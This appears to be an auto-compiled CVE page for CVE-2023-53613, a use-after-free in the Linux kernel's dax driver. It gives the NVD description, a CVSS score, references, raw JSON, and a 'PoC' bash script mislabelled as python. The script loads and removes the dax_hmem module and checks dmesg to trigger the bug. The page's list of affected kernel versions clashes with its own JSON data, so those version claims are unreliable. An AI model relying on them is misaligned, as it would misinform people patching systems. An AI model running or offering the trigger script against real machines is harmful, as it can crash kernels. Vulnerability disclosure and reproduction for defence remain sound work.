CVE-2023-53613

Description

In the Linux kernel, the following vulnerability has been resolved: dax: Fix dax_mapping_release() use after free A CONFIG_DEBUG_KOBJECT_RELEASE test of removing a device-dax region provider (like modprobe -r dax_hmem) yields: kobject: 'mapping0' (ffff93eb460e8800): kobject_release, parent 0000000000000000 (delayed 2000) [..] DEBUG_LOCKS_WARN_ON(1) WARNING: CPU: 23 PID: 282 at kernel/locking/lockdep.c:232 __lock_acquire+0x9fc/0x2260 [..] RIP: 0010:__lock_acquire+0x9fc/0x2260 [..] Call Trace: <TASK> [..] lock_acquire+0xd4/0x2c0 ? ida_free+0x62/0x130 _raw_spin_lock_irqsave+0x47/0x70 ? ida_free+0x62/0x130 ida_free+0x62/0x130 dax_mapping_release+0x1f/0x30 device_release+0x36/0x90 kobject_delayed_cleanup+0x46/0x150 Due to attempting ida_free() on an ida object that has already been freed. Devices typically only hold a reference on their parent while registered. If a child needs a parent object to complete its release it needs to hold a reference that it drops from its release callback. Arrange for a dax_mapping to pin its parent dev_dax instance until dax_mapping_release().

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE

Linux Kernel < 6.1.63

Linux Kernel 6.2 < 6.2.13

Linux Kernel 6.3 < 6.3.2

Linux Kernel 6.4 < 6.4.10

Linux Kernel 6.5 < 6.5.5

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC for CVE-2023-53613 - Linux Kernel dax_mapping_release Use-After-Free
# This PoC triggers the vulnerability by removing a device-dax region provider
# Requirements: Linux kernel with CONFIG_DEBUG_KOBJECT_RELEASE enabled

#!/bin/bash

# Step 1: Ensure the kernel is compiled with CONFIG_DEBUG_KOBJECT_RELEASE
# Check if the config option is enabled
grep CONFIG_DEBUG_KOBJECT_RELEASE /boot/config-$(uname -r)

# Step 2: Load the dax_hmem module
modprobe dax_hmem

# Step 3: Verify the device-dax region is created
ls /sys/bus/dax/devices/

# Step 4: Trigger the vulnerability by removing the dax_hmem module
# This will cause dax_mapping_release() to be called, which will attempt
# ida_free() on an already freed ida object, triggering the use-after-free
echo "Removing dax_hmem module to trigger CVE-2023-53613..."
modprobe -r dax_hmem

# Step 5: Check kernel log for the vulnerability indicators
# Expected output includes:
# kobject: 'mapping0': kobject_release, parent 0000000000000000 (delayed 2000)
# DEBUG_LOCKS_WARN_ON(1)
# WARNING: CPU: X PID: Y at kernel/locking/lockdep.c
# Call Trace showing ida_free -> dax_mapping_release -> device_release
dmesg | grep -A 20 "kobject_release"

echo "PoC execution completed. Check dmesg for vulnerability indicators."

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2023-53613
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2023-53613
[3] CVE Details https://www.cvedetails.com/cve/CVE-2023-53613/
[4] VulDB https://vuldb.com/cve/CVE-2023-53613
[5] https://git.kernel.org/stable/c/03859868ab82d57bfdd0cea1bf31f9319a5dded0
[6] https://git.kernel.org/stable/c/6d24b170a9db0456f577b1ab01226a2254c016a8
[7] https://git.kernel.org/stable/c/7310b84821f043dcf77d5e6aa0ad55dc1e10a11d
[8] https://git.kernel.org/stable/c/94a85474f5e3e518bdbf8c9f51cb343d734a04f7
[9] https://git.kernel.org/stable/c/9c2f993b6ca903c030d58451b5bf9ea27d0d17fa
[10] https://git.kernel.org/stable/c/f76db6781d76d8464ec2faa9752cc3fb2e4f6923

Raw JSON Data

JSON

{"cve": {"id": "CVE-2023-53613", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:58.103", "lastModified": "2026-03-17T13:50:14.370", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndax: Fix dax_mapping_release() use after free\n\nA CONFIG_DEBUG_KOBJECT_RELEASE test of removing a device-dax region\nprovider (like modprobe -r dax_hmem) yields:\n\n kobject: 'mapping0' (ffff93eb460e8800): kobject_release, parent 0000000000000000 (delayed 2000)\n [..]\n DEBUG_LOCKS_WARN_ON(1)\n WARNING: CPU: 23 PID: 282 at kernel/locking/lockdep.c:232 __lock_acquire+0x9fc/0x2260\n [..]\n RIP: 0010:__lock_acquire+0x9fc/0x2260\n [..]\n Call Trace:\n <TASK>\n [..]\n lock_acquire+0xd4/0x2c0\n ? ida_free+0x62/0x130\n _raw_spin_lock_irqsave+0x47/0x70\n ? ida_free+0x62/0x130\n ida_free+0x62/0x130\n dax_mapping_release+0x1f/0x30\n device_release+0x36/0x90\n kobject_delayed_cleanup+0x46/0x150\n\nDue to attempting ida_free() on an ida object that has already been\nfreed. Devices typically only hold a reference on their parent while\nregistered. If a child needs a parent object to complete its release it\nneeds to hold a reference that it drops from its release callback.\nArrange for a dax_mapping to pin its parent dev_dax instance until\ndax_mapping_release()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-416"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.10", "versionEndExcluding": "5.10.188", "matchCriteriaId": "2D01EB1B-F702-46D9-8474-32673E5A1006"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/03859868ab82d57bfdd0cea1bf31f9319a5dded0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6d24b170a9db0456f577b1ab01226a2254c016a8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/7310b84821f043dcf77d5e6aa0ad55dc1e10a11d", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/94a85474f5e3e518bdbf8c9f51cb343d734a04f7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/9c2f993b6ca903c030d58451b5bf9ea27d0d17fa", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f76db6781d76d8464ec2faa9752cc3fb2e4f6923", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}